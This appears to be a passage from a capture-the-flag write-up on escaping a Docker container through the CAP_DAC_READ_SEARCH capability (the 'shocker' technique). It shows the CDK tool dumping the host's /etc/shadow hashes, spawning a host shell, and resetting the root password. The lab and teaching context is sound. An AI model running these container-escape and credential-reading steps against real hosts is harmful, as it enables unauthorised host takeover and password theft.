CAP_DAC_READ_SEARCH
cap_dac_read_search allows a process to bypass file read, and directory read and execute permissions. While this was designed to be used for searching or reading files, it also grants the process permission to invoke open_by_handle_at(2).
Any process with the capability, CAP_DAC_READ_SEARCH, can use open_by_handle_at(2) to gain access to any file, even files outside their mount namespace.
The handle passed into open_by_handle_at(2) is intended to be an opaque identifier retrieved using name_to_handle_at(2). However, this handle contains sensitive and tamperable information, such as inode numbers.
this was first shown to be an issue in docker containers by sebastian krahmer with shocker exploit
root@c150397ccd63:/root# ./cdk run cap-dac-read-search
running with target: /etc/shadow, ref: /etc/hostname
root:$6$9GrOpvcijuCP93rg$tkcyh.ZwH5w9AHrm66awD9nLzMHv32QqZYGiIfuLow4V1PBkY0xsKoyZnM3.AI.yGWfFLOFDSKsIR9XnKLbIY1:19066:0:99999:7:::
daemon:*:18659:0:99999:7:::
bin:*:18659:0:99999:7:::
sys:*:18659:0:99999:7:::
sync:*:18659:0:99999:7:::
games:*:18659:0:99999:7:::
man:*:18659:0:99999:7:::
lp:*:18659:0:99999:7:::
mail:*:18659:0:99999:7:::
news:*:18659:0:99999:7:::
uucp:*:18659:0:99999:7:::
proxy:*:18659:0:99999:7:::
www-data:*:18659:0:99999:7:::
backup:*:18659:0:99999:7:::
list:*:18659:0:99999:7:::
irc:*:18659:0:99999:7:::
gnats:*:18659:0:99999:7:::
nobody:*:18659:0:99999:7:::
systemd-network:*:18659:0:99999:7:::
systemd-resolve:*:18659:0:99999:7:::
systemd-timesync:*:18659:0:99999:7:::
messagebus:*:18659:0:99999:7:::
syslog:*:18659:0:99999:7:::
_apt:*:18659:0:99999:7:::
tss:*:18659:0:99999:7:::
uuidd:*:18659:0:99999:7:::
tcpdump:*:18659:0:99999:7:::
landscape:*:18659:0:99999:7:::
pollinate:*:18659:0:99999:7:::
usbmux:*:18849:0:99999:7:::
sshd:*:18849:0:99999:7:::
systemd-coredump:!!:18849::::::
lxd:!:18849::::::
saul:$6$19rUyMaBLt7.CDGj$ik84VX1CUhhuiMHxq8hSMjKTDMxHt.ldQC15vFyupafquVyonyyb3/S6MO59tnJHP9vI5GMvbE9T4TFeeeKyg1:19058:0:99999:7:::By default, it reads the /etc/shadow files from the host
but there are more options available
root@c150397ccd63:/root# ./cdk run cap-dac-read-search /etc/hosts /
./cdk run cap-dac-read-search /etc/hosts /
running with target: /, ref: /etc/hosts
executing command(/bin/bash)...
root@c150397ccd63:/# This command basically spawns a shell session and attaches it to the current session.
Notice the directory has been changed to the system root, /. I’m in the target host now.
root@c150397ccd63:/root/.ssh# passwd
passwd
new password: qwe123
retype new password: qwe123
passwd: password updated successfullyFrom there, I could just change the password of the root user
saul@talkative:/dev$ su root
su root
password: qwe123
root@talkative:/dev# whoami
whoami
root
root@talkative:/dev# hostname
hostname
talkative
root@talkative:/dev# hostname -I
hostname -I
10.10.11.155 172.17.0.1 172.18.0.1 dead:beef::250:56ff:feb9:6b83 System Level Compromise